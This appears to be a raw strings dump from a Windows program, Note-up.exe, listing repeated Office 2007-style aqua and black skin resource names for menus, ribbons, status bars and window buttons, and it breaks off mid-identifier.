%Program Files%\Note-up\Note-up.exe
AQUA_IDB_OFFICE2007_MENU_BTN%AQUA_IDB_OFFICE2007_MENU_BTN_DISABLED%AQUA_IDB_OFFICE2007_MENU_BTN_SCROLL_T"AQUA_IDB_OFFICE2007_MENU_ITEM_BACK&AQUA_IDB_OFFICE2007_MENU_ITEM_MARKER_C&AQUA_IDB_OFFICE2007_MENU_ITEM_MARKER_R$AQUA_IDB_OFFICE2007_POPUPMENU_BORDER'AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR/AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV0AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT.AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V(AQUA_IDB_OFFICE2007_RIBBON_BORDER_FLOATY$AQUA_IDB_OFFICE2007_RIBBON_BTN_CHECK&AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT,AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE*AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT/AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_F&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_L&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_M&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_S*AQUA_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON#AQUA_IDB_OFFICE2007_RIBBON_BTN_MAIN'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M'AQUA_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B'AQUA_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S%AQUA_IDB_OFFICE2007_RIBBON_BTN_PAGE_L%AQUA_IDB_OFFICE2007_RIBBON_BTN_PAGE_R(AQUA_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B(AQUA_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M(AQUA_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T)AQUA_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN*AQUA_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE%AQUA_IDB_OFFICE2007_RIBBON_CAPTION_QA AQUA_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS(AQUA_IDB_OFFICE2007_RIBBON_CATEGORY_BACK'AQUA_IDB_OFFICE2007_RIBBON_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB/AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B/AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB,AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB&AQUA_IDB_OFFICE2007_RIBBON_KEYTIP_BACK'AQUA_IDB_OFFICE2007_RIBBON_PANEL_BACK_B'AQUA_IDB_OFFICE2007_RIBBON_PANEL_BACK_T*AQUA_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR(AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_BACK,AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY*AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL.AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT AQUA_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS*AQUA_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS'AQUA_IDB_OFFICE2007_RIBBON_SLIDER_THUMB"AQUA_IDB_OFFICE2007_STATUSBAR_BACK&AQUA_IDB_OFFICE2007_STATUSBAR_BACK_EXT(AQUA_IDB_OFFICE2007_STATUSBAR_PANEBORDER%AQUA_IDB_OFFICE2007_STATUSBAR_SIZEBOX AQUA_IDB_OFFICE2007_SYS_BTN_BACK"AQUA_IDB_OFFICE2007_SYS_BTN_BACK_S!AQUA_IDB_OFFICE2007_SYS_BTN_CLOSE#AQUA_IDB_OFFICE2007_SYS_BTN_CLOSE_S$AQUA_IDB_OFFICE2007_SYS_BTN_MAXIMIZE&AQUA_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S$AQUA_IDB_OFFICE2007_SYS_BTN_MINIMIZE&AQUA_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S#AQUA_IDB_OFFICE2007_SYS_BTN_RESTORE%AQUA_IDB_OFFICE2007_SYS_BTN_RESTORE_S
AQUA_IDB_OFFICE2007_MENU_BTN%AQUA_IDB_OFFICE2007_MENU_BTN_DISABLED%AQUA_IDB_OFFICE2007_MENU_BTN_SCROLL_T"AQUA_IDB_OFFICE2007_MENU_ITEM_BACK&AQUA_IDB_OFFICE2007_MENU_ITEM_MARKER_C&AQUA_IDB_OFFICE2007_MENU_ITEM_MARKER_R$AQUA_IDB_OFFICE2007_POPUPMENU_BORDER'AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR/AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV0AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT.AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V(AQUA_IDB_OFFICE2007_RIBBON_BORDER_FLOATY$AQUA_IDB_OFFICE2007_RIBBON_BTN_CHECK&AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT,AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE*AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT/AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_F&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_L&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_M&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_S*AQUA_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON#AQUA_IDB_OFFICE2007_RIBBON_BTN_MAIN'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M'AQUA_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B'AQUA_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S%AQUA_IDB_OFFICE2007_RIBBON_BTN_PAGE_L%AQUA_IDB_OFFICE2007_RIBBON_BTN_PAGE_R(AQUA_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B(AQUA_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M(AQUA_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T)AQUA_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN*AQUA_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE%AQUA_IDB_OFFICE2007_RIBBON_CAPTION_QA AQUA_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS(AQUA_IDB_OFFICE2007_RIBBON_CATEGORY_BACK'AQUA_IDB_OFFICE2007_RIBBON_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB/AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B/AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB,AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB&AQUA_IDB_OFFICE2007_RIBBON_KEYTIP_BACK'AQUA_IDB_OFFICE2007_RIBBON_PANEL_BACK_B'AQUA_IDB_OFFICE2007_RIBBON_PANEL_BACK_T*AQUA_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR(AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_BACK,AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY*AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL.AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT AQUA_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS*AQUA_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS'AQUA_IDB_OFFICE2007_RIBBON_SLIDER_THUMB"AQUA_IDB_OFFICE2007_STATUSBAR_BACK&AQUA_IDB_OFFICE2007_STATUSBAR_BACK_EXT(AQUA_IDB_OFFICE2007_STATUSBAR_PANEBORDER%AQUA_IDB_OFFICE2007_STATUSBAR_SIZEBOX AQUA_IDB_OFFICE2007_SYS_BTN_BACK"AQUA_IDB_OFFICE2007_SYS_BTN_BACK_S!AQUA_IDB_OFFICE2007_SYS_BTN_CLOSE#AQUA_IDB_OFFICE2007_SYS_BTN_CLOSE_S$AQUA_IDB_OFFICE2007_SYS_BTN_MAXIMIZE&AQUA_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S$AQUA_IDB_OFFICE2007_SYS_BTN_MINIMIZE&AQUA_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S#AQUA_IDB_OFFICE2007_SYS_BTN_RESTORE%AQUA_IDB_OFFICE2007_SYS_BTN_RESTORE_S
BLACK_IDB_OFFICE2007_MENU_BTN&BLACK_IDB_OFFICE2007_MENU_BTN_DISABLED&BLACK_IDB_OFFICE2007_MENU_BTN_SCROLL_T,BLACK_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR#BLACK_IDB_OFFICE2007_MENU_ITEM_BACK'BLACK_IDB_OFFICE2007_MENU_ITEM_MARKER_C'BLACK_IDB_OFFICE2007_MENU_ITEM_MARKER_R%BLACK_IDB_OFFICE2007_OUTLOOK_BAR_BACK%BLACK_IDB_OFFICE2007_OUTLOOK_BTN_PAGE%BLACK_IDB_OFFICE2007_POPUPMENU_BORDER(BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR0BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV1BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT/BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V)BLACK_IDB_OFFICE2007_RIBBON_BORDER_FLOATY&BLACK_IDB_OFFICE2007_RIBBON_BORDER_QAT%BLACK_IDB_OFFICE2007_RIBBON_BTN_CHECK'BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT,BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON-BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT0BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_F'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_L'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_M'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_S&BLACK_IDB_OFFICE2007_RIBBON_BTN_LAUNCH BLACK_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON$BLACK_IDB_OFFICE2007_RIBBON_BTN_MAIN(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M(BLACK_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B(BLACK_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S&BLACK_IDB_OFFICE2007_RIBBON_BTN_PAGE_L&BLACK_IDB_OFFICE2007_RIBBON_BTN_PAGE_R)BLACK_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B)BLACK_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M)BLACK_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T*BLACK_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN BLACK_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE&BLACK_IDB_OFFICE2007_RIBBON_CAPTION_QA,BLACK_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS)BLACK_IDB_OFFICE2007_RIBBON_CATEGORY_BACK(BLACK_IDB_OFFICE2007_RIBBON_CATEGORY_TAB,BLACK_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB0BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B0BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB-BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB'BLACK_IDB_OFFICE2007_RIBBON_KEYTIP_BACK(BLACK_IDB_OFFICE2007_RIBBON_PANEL_BACK_B(BLACK_IDB_OFFICE2007_RIBBON_PANEL_BACK_T&BLACK_IDB_OFFICE2007_RIBBON_PANEL_MAIN-BLACK_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER%BLACK_IDB_OFFICE2007_RIBBON_PANEL_QAT BLACK_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR)BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_BACK-BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL/BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT,BLACK_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS BLACK_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS(BLACK_IDB_OFFICE2007_RIBBON_SLIDER_THUMB#BLACK_IDB_OFFICE2007_STATUSBAR_BACK'BLACK_IDB_OFFICE2007_STATUSBAR_BACK_EXT)BLACK_IDB_OFFICE2007_STATUSBAR_PANEBORDER&BLACK_IDB_OFFICE2007_STATUSBAR_SIZEBOX!BLACK_IDB_OFFICE2007_SYS_BTN_BACK#BLACK_IDB_OFFICE2007_SYS_BTN_BACK_S"BLACK_IDB_OFFICE2007_SYS_BTN_CLOSE$BLACK_IDB_OFFICE2007_SYS_BTN_CLOSE_S%BLACK_IDB_OFFICE2007_SYS_BTN_MAXIMIZE'BLACK_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S%BLACK_IDB_OFFICE2007_SYS_BTN_MINIMIZE'BLACK_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S$BLACK_IDB_OFFICE2007_SYS_BTN_RESTORE&BLACK_IDB_OFFICE2007_SYS_BTN_RESTORE_S
BLACK_IDB_OFFICE2007_MENU_BTN&BLACK_IDB_OFFICE2007_MENU_BTN_DISABLED&BLACK_IDB_OFFICE2007_MENU_BTN_SCROLL_T,BLACK_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR#BLACK_IDB_OFFICE2007_MENU_ITEM_BACK'BLACK_IDB_OFFICE2007_MENU_ITEM_MARKER_C'BLACK_IDB_OFFICE2007_MENU_ITEM_MARKER_R%BLACK_IDB_OFFICE2007_OUTLOOK_BAR_BACK%BLACK_IDB_OFFICE2007_OUTLOOK_BTN_PAGE%BLACK_IDB_OFFICE2007_POPUPMENU_BORDER(BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR0BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV1BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT/BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V)BLACK_IDB_OFFICE2007_RIBBON_BORDER_FLOATY&BLACK_IDB_OFFICE2007_RIBBON_BORDER_QAT%BLACK_IDB_OFFICE2007_RIBBON_BTN_CHECK'BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT,BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON-BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT0BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_F'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_L'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_M'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_S&BLACK_IDB_OFFICE2007_RIBBON_BTN_LAUNCH BLACK_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON$BLACK_IDB_OFFICE2007_RIBBON_BTN_MAIN(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M(BLACK_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B(BLACK_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S&BLACK_IDB_OFFICE2007_RIBBON_BTN_PAGE_L&BLACK_IDB_OFFICE2007_RIBBON_BTN_PAGE_R)BLACK_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B)BLACK_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M)BLACK_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T*BLACK_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN BLACK_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE&BLACK_IDB_OFFICE2007_RIBBON_CAPTION_QA,BLACK_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS)BLACK_IDB_OFFICE2007_RIBBON_CATEGORY_BACK(BLACK_IDB_OFFICE2007_RIBBON_CATEGORY_TAB,BLACK_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB0BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B0BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB-BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y